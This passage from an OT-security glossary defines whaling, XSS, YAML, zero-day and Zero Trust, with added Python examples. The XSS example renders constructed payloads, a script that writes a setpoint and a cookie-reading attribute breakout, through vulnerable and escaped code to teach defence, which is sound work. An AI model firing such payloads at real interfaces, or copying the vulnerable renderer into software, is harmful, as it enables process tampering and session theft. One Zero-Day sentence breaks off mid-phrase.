Intrinsic Limitations: VPNs use encryption, and so all the limitations of cryptosystems apply here: VPNs have little value if keys have been stolen, VPNs are software that can be compromised, VPNs offer no protection against compromised endpoints, and so on.
Whaling
Definition: Whaling is a type of highly targeted phishing attack that focuses on senior executives or other high-profile targets within an organization. Unlike typical phishing attacks that are sent to large numbers of people, whaling attacks are tailored specifically for individuals who have access to critical information or assets, such as CEOs, CFOs, or other key decision-makers. The attacker often impersonates a trusted party, like a business associate or internal colleague, to manipulate the victim into disclosing sensitive information or transferring funds.
Importance in Cybersecurity: Whaling is particularly dangerous because it exploits human factors at the highest level of an organization, where decisions involving large sums of money or highly confidential information are made. Successful whaling attacks can result in significant financial loss, data breaches, or even reputation damage for a company.
Example in OT Security: In the context of Operational Technology (OT) security, a whaling attack could target executives responsible for critical infrastructure, such as a power plant or manufacturing facility. The attacker might pose as a trusted vendor or government regulator, convincing the executive to approve changes to OT systems, which could lead to disruptions in industrial processes, safety risks, or even sabotage of critical infrastructure. Therefore, it is essential for OT leadership to be trained in identifying and mitigating whaling attempts to protect the integrity of operations.
XSS (Cross-Site Scripting)
Definition: Cross-Site Scripting (XSS) is a type of security vulnerability typically found in web applications. It occurs when an attacker injects malicious scripts into content from trusted websites. XSS allows attackers to execute scripts in the victim’s browser, which can lead to actions like data theft, session hijacking, or defacement of websites.
Types of XSS:
- Stored XSS: The malicious script is permanently stored on the target server (e.g., in a database), and every time the user accesses the page, the script is executed.
- Reflected XSS: The malicious script is reflected off a web server, like in a search result or error message, and is delivered to the user via a URL or another method.
- DOM-based XSS: This type of XSS exploits vulnerabilities in the Document Object Model (DOM) environment within a user’s browser.
Importance in Cybersecurity: XSS attacks can have serious consequences for both users and organizations. Attackers can use XSS to gain control over user sessions, steal sensitive information, or perform unauthorized actions on behalf of the user.
Example in OT Security: Although XSS is generally a web-based vulnerability, as OT systems increasingly use web interfaces for monitoring and management, XSS could be used to compromise an OT system. For example, an attacker could exploit an XSS vulnerability in a web-based Human-Machine Interface (HMI) to gain unauthorized control over critical OT operations, such as adjusting safety settings or shutting down systems remotely. Therefore, securing web interfaces in OT environments against XSS is crucial to maintaining operational security.
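The HMI scenario above, as an added example that is not part of the glossary: a server-side rendering function for a tag table, once in the vulnerable form that interpolates operator-supplied fields straight into HTML, and once hardened with context-appropriate escaping. The payload, tag names and endpoint path are constructed for the example; `has_live_script` is a crude checker used only to compare the two outputs.

```python
# Added example: stored/reflected XSS in a web HMI tag table, vulnerable vs. hardened rendering.
import html

# Constructed attacker input: a "tag name" that, if rendered unescaped, makes every
# operator's browser issue a setpoint write. The API path is an assumption for the example.
PAYLOAD = "<script>fetch('/api/setpoint?tag=PT101&value=0')</script>"
ATTR_PAYLOAD = 'x" onfocus="alert(document.cookie)'   # breaks out of a quoted attribute

def render_tag_row_vulnerable(tag_name: str, description: str) -> str:
    """Interpolates user-controlled fields straight into HTML: the XSS bug."""
    return f'<tr><td>{tag_name}</td><td><input name="desc" value="{description}"></td></tr>'

def render_tag_row_hardened(tag_name: str, description: str) -> str:
    """Escapes each value for its context: element body and double-quoted attribute."""
    return (f"<tr><td>{html.escape(tag_name)}</td>"
            f'<td><input name="desc" value="{html.escape(description, quote=True)}"></td></tr>')

# Defence in depth: a CSP that refuses inline script still limits damage if an
# escaping bug slips through (value is an assumption; tune to the HMI's real needs).
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; script-src 'self'; object-src 'none'")

def has_live_script(document: str) -> bool:
    """Crude check for the example only: a raw <script tag or an attribute breakout survived."""
    low = document.lower()
    return "<script" in low or '" on' in low

if __name__ == "__main__":
    print(render_tag_row_vulnerable(PAYLOAD, ATTR_PAYLOAD))
    print(render_tag_row_hardened(PAYLOAD, ATTR_PAYLOAD))
```

The escaping has to match the context the value lands in: `html.escape` is right for element bodies and quoted attributes, but a value placed inside a `<script>` block, a URL or an inline event handler needs that context's own encoding, and the safest course is to never put user data in those positions at all.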
YAML (YAML Ain't Markup Language)
Definition: YAML is a human-readable data serialization standard often used for configuration files and data exchange between languages with different data structures. It is designed to be easily readable and writable by humans while still being usable for complex data structures. YAML uses indentation to define structure, making it more intuitive for developers compared to formats like JSON or XML.
Importance in Cybersecurity: YAML is widely used in security-related applications, especially for defining infrastructure-as-code (IaC) in DevOps and security automation processes. Configuration management tools like Ansible, Kubernetes, and Docker use YAML to define infrastructure, policies, and access controls. Properly secured and verified YAML configurations are crucial to avoid vulnerabilities such as misconfigurations that could lead to unauthorized access or insecure deployments.
Example in OT Security: YAML is often used to configure cloud and edge devices integrated into OT networks. Ensuring the integrity and security of YAML files that configure these systems is critical to preventing configuration-based attacks that could compromise industrial processes or critical infrastructure.
Zero-Day
Definition: A zero-day vulnerability refers to a software or hardware security flaw that is unknown to the parties responsible for fixing it, such as the vendor or developer. The term “zero-day” refers to the vendor having had zero days to fix the flaw: it is known to, or already exploited by, attackers before a patch exists. When a zero-day exploit is used by attackers, it can cause widespread harm because there is no immediate defense available beyond generic mitigations such as segmentation and allow-listing. Once the vulnerability is made public and a fix is developed, it is no longer considered a zero-day.
Importance: Zero-day vulnerabilities are highly sought after by cybercriminals and nation-state actors because they can be exploited to launch attacks with a high degree of success. They are often used in sophisticated attacks like Advanced Persistent Threats (APT) or malware campaigns. This includes finding
Example: In 2020, a critical zero-day vulnerability in Zoom allowed attackers to potentially access meeting data without users’ knowledge.
Zero Trust
Definition: Zero Trust is a cybersecurity framework that operates under the principle of “never trust, always verify.” In this model, no user, device, or system—whether inside or outside an organization’s network— is trusted by default. Every access request is thoroughly authenticated, authorized, and continuously validated based on multiple factors like user identity, device health, and network context.
Relation to OT Security: In Operational Technology (OT) environments, Zero Trust is particularly important due to the critical infrastructure involved, such as industrial control systems (ICS), manufacturing plants, and utilities. Traditional OT systems were often designed to operate in isolated networks, assuming that perimeter security was sufficient. However, as these systems become more interconnected and integrated with IT networks, the attack surface expands, making them more vulnerable to cyber threats.
Applying Zero Trust to OT security involves:
- Segmentation: Creating smaller, more manageable zones within the OT network to limit lateral movement of threats.
- Access Control: Enforcing strict identity verification for every user or device trying to access critical OT systems.
- Continuous Monitoring: Continuously assessing the health and security posture of all OT assets to detect anomalous or unauthorized activity in real-time.
- Least Privilege: Limiting access rights for users and systems to only what is necessary for their function to reduce potential risks.
Importance: Implementing Zero Trust in OT environments helps mitigate risks such as insider threats, advanced persistent threats (APTs), and supply chain attacks, providing a more resilient approach to securing critical infrastructure.
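The four elements listed above, as an added example that is not part of the glossary: a deny-by-default policy check that evaluates every request against segmentation (which zones may reach which), identity (MFA on each request), device posture, and a least-privilege role table. The zone names, roles, actions and posture fields are assumptions constructed for the example, not any standard's terms.

```python
# Added example: per-request Zero Trust policy evaluation for an OT environment.
from dataclasses import dataclass

@dataclass(frozen=True)
class DevicePosture:
    managed: bool       # enrolled in corporate device management
    patched: bool       # all required security updates installed
    av_current: bool    # endpoint protection present and up to date

@dataclass(frozen=True)
class AccessRequest:
    user: str
    roles: frozenset
    mfa_verified: bool  # verified for this request, not inherited from an old session
    device: DevicePosture
    src_zone: str
    dst_zone: str
    action: str

# Constructed policy tables (assumptions for the example).
# Segmentation: the only zone-to-zone paths that exist at all.
ALLOWED_PATHS = {("enterprise", "dmz"), ("dmz", "control"), ("control", "control")}
# Least privilege: per destination zone, which roles may perform which actions.
ROLE_ACTIONS = {
    "control": {"ot-engineer": {"read", "write-setpoint"}, "ot-viewer": {"read"}},
    "dmz":     {"ot-engineer": {"read"}, "ot-viewer": {"read"}, "it-analyst": {"read"}},
}

def evaluate(req: AccessRequest) -> tuple:
    """Return (allowed, reason). Every check must pass; nothing is trusted by location."""
    if (req.src_zone, req.dst_zone) not in ALLOWED_PATHS:
        return False, f"segmentation: no path from {req.src_zone} to {req.dst_zone}"
    if not req.mfa_verified:
        return False, "identity: MFA required on every request"
    d = req.device
    if not (d.managed and d.patched and d.av_current):
        return False, "posture: device fails health checks"
    permitted = set()
    for role in req.roles:
        permitted |= ROLE_ACTIONS.get(req.dst_zone, {}).get(role, set())
    if req.action not in permitted:
        return False, f"least privilege: {req.action} not granted in {req.dst_zone}"
    return True, "allowed"

# Constructed sample requests.
GOOD_DEVICE = DevicePosture(managed=True, patched=True, av_current=True)
STALE_DEVICE = DevicePosture(managed=True, patched=False, av_current=True)

def engineer_write(mfa=True, device=GOOD_DEVICE, src="dmz", roles=("ot-engineer",), action="write-setpoint"):
    return AccessRequest("alice", frozenset(roles), mfa, device, src, "control", action)

if __name__ == "__main__":
    print(evaluate(engineer_write()))
    print(evaluate(engineer_write(src="enterprise")))
    print(evaluate(engineer_write(device=STALE_DEVICE)))
    print(evaluate(engineer_write(roles=("ot-viewer",))))
```

The point of the ordering is that a request is rejected at the first failing check and the reason names which of the four controls rejected it, which is what the continuous-monitoring element consumes: a burst of "segmentation" denials from one host is a different investigation from a burst of "least privilege" denials from one account.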